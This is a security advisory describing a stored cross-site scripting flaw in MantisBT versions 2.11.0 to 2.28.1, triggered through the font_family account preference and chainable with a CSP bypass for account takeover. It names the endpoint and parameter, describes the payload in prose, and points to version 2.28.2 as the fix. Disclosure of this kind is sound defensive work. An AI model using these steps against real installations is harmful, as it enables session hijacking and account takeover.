Mantis Bug Tracker Cross-Site Scripting Vulnerability Allowing Account Takeover

A cross-site scripting (XSS) vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions 2.11.0 through 2.28.1. This vulnerability allows any authenticated user to inject arbitrary HTML by updating their account's font family preference. The injected HTML is executed as a script, reflecting the XSS payload on every MantisBT page. Additionally, this vulnerability can be leveraged to take over the user's account by exploiting a Content Security Policy (CSP) bypass vulnerability, also present in MantisBT.

Impact

Exploitation of this vulnerability allows for cross-site scripting, with the injected script being executed in the context of the user's session.

Reproduction

To reproduce this vulnerability, an authenticated user can send a POST request to the 'account_prefs_update.php' endpoint. This request must include a 'font_family' parameter with a value that contains the injected HTML, such as a script tag referencing a JavaScript file that exploits the CSP bypass vulnerability. Once the font family preference is updated, the injected script will be executed when the user accesses any MantisBT page.

Remediation

Users can update to MantisBT version 2.28.2, where this vulnerability has been fixed.